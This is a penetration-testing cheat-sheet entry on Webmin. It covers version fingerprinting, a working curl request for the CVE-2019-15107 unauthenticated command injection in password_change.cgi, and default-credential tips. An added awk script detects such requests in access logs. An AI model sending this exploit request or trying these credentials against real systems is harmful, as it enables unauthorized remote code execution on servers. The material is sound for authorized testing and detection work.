Webmin
What it is: Web-based system administration tool for Unix/Linux. Manages users, services, configs through a browser interface. Usually runs on port 10000 with HTTPS.
Default ports: 10000
Vuln research:
Identify Webmin version
Usually on port 10000. Check the login page source for a version string.
curl -sk "https://$IP:10000/" | grep -i version
Webmin RCE (CVE-2019-15107)
Unauthenticated RCE on Webmin 1.890-1.920 through the password reset backdoor in password_change.cgi
curl -sk "https://$IP:10000/password_change.cgi" -d 'user=root&pam=&expired=2&old=id%7Cid&new1=test&new2=test'
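Detection side of the request above (added example, not part of the original notes): list clients that POST to /password_change.cgi without a logged-in user. Assumptions: the access log is in Common Log Format, the sample lines are constructed, and the function names are hypothetical.

```shell
#!/bin/sh
# Added example: flag unauthenticated POSTs to /password_change.cgi.
# Assumption: Common Log Format lines:
#   host ident user [time tz] "METHOD path proto" status size

# Constructed sample log lines (documentation IP ranges), not from a real host.
sample_log() {
cat <<'EOF'
192.0.2.10 - root [17/Aug/2019:10:01:02 +0000] "GET / HTTP/1.1" 200 5120
192.0.2.10 - root [17/Aug/2019:10:01:40 +0000] "POST /password_change.cgi HTTP/1.1" 200 400
198.51.100.7 - - [17/Aug/2019:10:02:11 +0000] "GET / HTTP/1.1" 200 3310
198.51.100.7 - - [17/Aug/2019:10:02:12 +0000] "POST /password_change.cgi HTTP/1.1" 200 412
198.51.100.7 - - [17/Aug/2019:10:02:15 +0000] "POST /password_change.cgi HTTP/1.1" 200 398
203.0.113.44 - - [17/Aug/2019:11:30:00 +0000] "POST /other.cgi HTTP/1.1" 302 0
203.0.113.9 - - [17/Aug/2019:12:00:00 +0000] "POST /password_change.cgi?x=1 HTTP/1.1" 500 120
EOF
}

# Reads log lines on stdin and prints "count source_ip", busiest source first.
# Only requests with no authenticated user ("-" in field 3) are counted,
# matching the unauthenticated request shape shown above.
flag_password_change_posts() {
  awk '
    {
      user = $3
      method = $6; sub(/^"/, "", method)   # strip the opening quote
      path = $7;   sub(/\?.*/, "", path)   # ignore any query string
      if (method == "POST" && path == "/password_change.cgi" && user == "-")
        hits[$1]++
    }
    END { for (ip in hits) print hits[ip], ip }
  ' | sort -k1,1nr -k2,2
}

# Run over the constructed sample when executed directly.
sample_log | flag_password_change_posts
```

A hit is a lead for triage, not proof of exploitation: the command injected through the old field travels in the POST body, which this log format does not record.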
Default credentials
Common Webmin logins — Check for password reuse with system accounts
# root:<system password>
# admin:admin
# Webmin uses PAM by default, so system credentials work